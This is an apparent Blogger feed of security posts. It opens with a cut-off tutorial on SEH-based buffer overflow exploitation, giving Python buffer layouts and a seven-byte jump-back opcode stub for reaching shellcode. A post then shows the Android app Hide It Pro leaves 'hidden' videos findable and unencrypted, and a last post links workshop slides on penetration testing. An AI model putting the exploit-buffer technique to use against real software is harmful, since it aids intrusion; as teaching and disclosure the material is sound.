<br /></div>
<div>
junk1= 'A'*500</div>
<div>
junk2= 'A'*12</div>
<div>
buffy= junk1 + nseh + seh + '\x90'*8 + junk2</div>
<div>
<br /></div>
<div>
So, we need to jump back at least before the shellcode, for example our shellcode are 200 bytes, the buffer will be</div>
<div>
<br /></div>
<div>
buffy = 'A'*300 + shellcode + nseh + seh + '\x90'*8 + junk2</div>
<div>
<br /></div>
<div>
we need to jump back at least 220 bytes, to land in junk1, so we need 'junk2' to make us Jump back. to do this we can use decrement CH register (1 = 256 bytes decrease from ECX), but before doing that after we doing POP, POP, RETN the pointer three places down in the stack, to get this memory address to ECX register, we need to do POP ECX, POP ECX, POP ECX, after that Jump to ECX and it will moves back 256 from the original POP, POP, RETN instructions land.</div>
<div>
<br /></div>
<div>
So, here what we are doing</div>
<div>
<br />
<a name='more'></a>POP ECX \x59</div>
<div>
POP ECX \x59</div>
<div>
POP ECX \x59</div>
<div>
DEC CH \xfe\xcd</div>
<div>
JMP ECX \xff\xe1</div>
<div>
<br /></div>
<div>
and the shellcode/payload for junk2 only 7 bytes long ("\x59\x59\x59\xfe\xcd\xff\xe1"), so the buffer will go </div>
<div>
<br /></div>
<div>
buffy = 'A'*300 + shellcode + nseh + seh + '\x90'*13 + "\x59\x59\x59\xfe\xcd\xff\xe1"<br />
<br />
Voila!<br />
<br />
* if you need approx 512 (dec CH twice)</div>
<div>
<br /></div>
<div>
** i guess i never write about buffer overflow before, because there are so many great article about buffer overflow in other sites, but for this one i found it so rare.<br />
<br />
*** or u could use <b>egg-hunting </b>or use <b>jump short</b> (\xe9) </div>y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com0tag:blogger.com,1999:blog-8300373.post-44157929233800289512012-03-10T13:56:00.000+07:002012-03-10T14:25:44.007+07:00Android apps: Hide It Pro #FAIL<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc_wS-m4bQ48V24RkoVRg1H-zlqe10gmqY_rC3gR6SEVChKOfqKk3cVEHMy2Oocrmg1Ka263TAlnIfk-a92We57l84HnUyOjnvlIPGPe6hN2uhyQfRHdwNJU8LXVkDZHtMUM4w/s1600/screen-capture-49.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc_wS-m4bQ48V24RkoVRg1H-zlqe10gmqY_rC3gR6SEVChKOfqKk3cVEHMy2Oocrmg1Ka263TAlnIfk-a92We57l84HnUyOjnvlIPGPe6hN2uhyQfRHdwNJU8LXVkDZHtMUM4w/s200/screen-capture-49.png" width="191" /></a></div>
If you are an Android users and using <a href="https://play.google.com/store/apps/details?id=com.smartanuj.hideitpro" target="_blank"><b>Hide It Pro</b></a> as application to hide your pictures, videos and else, please think again.<br />
<blockquote class="tr_bq">
<blockquote class="tr_bq">
<span style="background-color: white; color: #333333; line-height: 16px; text-align: left;"><span style="font-family: inherit;"><b>Hide it Pro</b></span>, Hide Pictures and Videos in your phone. COMPLETELY FREE and UNLIMITED version. Only app in android market having full 5 stars rating with 1,000,000 downloads</span></blockquote>
</blockquote>
<div>
Well, I've always curious with this kind of application that offer hiding and protecting our data. So, i just give it a try (its free), i try to use this Application to hide some the videos, for example movie with title "musket.avi". After its completely gone from default <b>Android Video Player application</b> movie lists, i try the simple <s>attack </s> attempt by searching the file via commandline (ssh to android)<br />
<br />
<a name='more'></a></div>
<span class="fullpost"></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge9u1AMzoXvEktUYk2WGmdd3OkKP39B2kCQzPOS9UoXZOVBf_cJO_W3yI0a4efIO5M21KHjOuPDbqsyXbLBcCDZTvx1BISCRTB8qUMZnG_9X9P_JxG9W-_-KNCLmAD9b-jSdua/s1600/screen-capture-48.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="61" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge9u1AMzoXvEktUYk2WGmdd3OkKP39B2kCQzPOS9UoXZOVBf_cJO_W3yI0a4efIO5M21KHjOuPDbqsyXbLBcCDZTvx1BISCRTB8qUMZnG_9X9P_JxG9W-_-KNCLmAD9b-jSdua/s320/screen-capture-48.png" width="320" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge9u1AMzoXvEktUYk2WGmdd3OkKP39B2kCQzPOS9UoXZOVBf_cJO_W3yI0a4efIO5M21KHjOuPDbqsyXbLBcCDZTvx1BISCRTB8qUMZnG_9X9P_JxG9W-_-KNCLmAD9b-jSdua/s1600/screen-capture-48.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a></div>
<div>
and well, the "find" command are able to found the file, so? its not hidden enough.<br />
<br />
The application just move the file from some place that generic video player would be able to detect into some place that it wouldn't be able to detect in this case "/mnt/sdcard/ProgramData/Android/Language/.fr/videos/" (maybe, you might found a different place, but its findable) and with "Random" (we define it at hide it pro application") as folder name.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj61QGp8zGQ6YlGbdu1LWr0X6Mx9PibubPA1uYPSzBF8ncyILu8B5IRuDyKih8XK4OhGx9jSzYwhqTyOPwzrBoWk2GlH-u5eNYk65i4b7Caffb-AyQzz5Unx6kQ79Lil-NJFRH6/s1600/capture_08.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj61QGp8zGQ6YlGbdu1LWr0X6Mx9PibubPA1uYPSzBF8ncyILu8B5IRuDyKih8XK4OhGx9jSzYwhqTyOPwzrBoWk2GlH-u5eNYk65i4b7Caffb-AyQzz5Unx6kQ79Lil-NJFRH6/s200/capture_08.png" width="200" /></a></div>
<br />
So its not hide enough; I just think, maybe its an encrypted file, as stated on the web (support encryption). So i just browse from the inside of android device via "explorer" application, and suprissingly its playable. #FAIL<br />
<br />
<br /></div>y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com0tag:blogger.com,1999:blog-8300373.post-21166308133904714572012-01-09T13:22:00.002+07:002012-01-13T00:12:28.701+07:00Technical Workshop Material for BPPT<span class="" id="result_box" lang="en"><span class="hps">Last year</span> <span class="hps">(<i>actually</i></span><i> <span class="hps">more than a month</span> <span class="hps">ago</span></i> :<span class="hps">lol</span>:). <span class="hps">I</span> <span class="hps">and</span> <span class="hps">two</span> <span class="hps">other</span> <span class="hps">friends</span> had an opportunity <span class="hps">to give a</span> <span class="hps">workshops</span> <span class="hps">related to Information Security</span><span class="hps"> to the</span> <span class="hps">participants</span> from <span class="hps">BPPT</span>. <span class="hps">This workshop</span> <span class="hps">covers</span> <span class="hps">most aspects of</span> <span class="hps">Information</span> <span class="hps">Security</span>, <span class="hps">and</span> <span class="hps">aims to provide</span> <span class="hps">hands-on experience</span> <span class="hps">to participants</span><span class="hps"></span><span class="hps"></span><span class="hps"> for every sessions</span>/<span class="hps">material</span>.<br /><br /> <span class="hps">I myself</span> <span class="hps">assigned to</span> <span class="hps">convey the</span> <span class="hps">three</span> <span class="hps">sessions/materials</span>, <span class="hps">namely</span>:<br /> <span class="hps">1.</span> <span class="hps">Security</span> <span class="hps">Penetration</span> <span class="hps">Testing,</span><br /> <span class="hps">2.</span> <span class="hps">Network Security,</span> <span class="hps">and</span><br /> <span class="hps">3.</span> <span class="hps">Internet</span> <span class="hps">Security.</span></span><br />
<br />
<span class="" id="result_box" lang="en"><span class="hps">While others will cover: Wireless Security, Web application Security, Digital Forensic, Firewall and IPS/IDS, </span><br /><br /> <span class="hps">Surely the time</span> <span class="hps">4 hours/subject</span><span class="hps"> is far from enough,</span> <span class="hps">but 90</span>% <span class="hps">of time</span> <span class="hps">used</span> <span class="hps">for hands</span>-on <span class="hps">and 10</span>% of it for <span class="hps">theory</span>, <span class="hps">so that we hope the</span> <span class="hps">participants</span> <span class="hps">still get</span> <span class="hps">an overview of the</span> <span class="hps">activities they</span> <span class="hps">do alone</span>. </span><br />
<br />
<span class="" id="result_box" lang="en"><span class="hps">Here is</span> <span class="hps">the</span> <span class="hps">10%</span> (<i>the theory materials</i>), most of the image, screenshot, video are removed <span class="">:</span><span class="">)</span></span><br />
<br />
<span class="" id="result_box" lang="en"><span class=""></span></span><br />
<a name='more'></a><b style="display: block; margin: 12px 0 4px;"><a href="http://www.slideshare.net/y3dips/penetration-testing-10902959" title="Penetration testing">Penetration testing</a></b><object height="355" id="__sse10902959" width="425"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=penetrationtesting-120108233935-phpapp02&stripped_title=penetration-testing-10902959&userName=y3dips" />
<param name="allowFullScreen" value="true"/>
<param name="allowScriptAccess" value="always"/>
<param name="wmode" value="transparent"/>
<embed name="__sse10902959" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=penetrationtesting-120108233935-phpapp02&stripped_title=penetration-testing-10902959&userName=y3dips" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" wmode="transparent" width="425" height="355"></embed></object><br />
<div id="__ss_10902959" style="width: 425px;">
<div style="padding: 5px 0 12px;">
View more <a href="http://www.slideshare.net/">presentations</a> from <a href="http://www.slideshare.net/y3dips">ammar wk</a>.</div>
</div>
<div id="__ss_10903013" style="width: 425px;">
<b style="display: block; margin: 12px 0 4px;"><a href="http://www.slideshare.net/y3dips/network-security-10903013" title="Network security">Network security</a></b><object height="355" id="__sse10903013" width="425"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=networksecurity-120108234214-phpapp02&stripped_title=network-security-10903013&userName=y3dips" />
<param name="allowFullScreen" value="true"/>
<param name="allowScriptAccess" value="always"/>
<param name="wmode" value="transparent"/>
<embed name="__sse10903013" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=networksecurity-120108234214-phpapp02&stripped_title=network-security-10903013&userName=y3dips" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" wmode="transparent" width="425" height="355"></embed></object><br />
<div style="padding: 5px 0 12px;">
View more <a href="http://www.slideshare.net/">presentations</a> from <a href="http://www.slideshare.net/y3dips">ammar wk</a>.</div>
</div>y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com3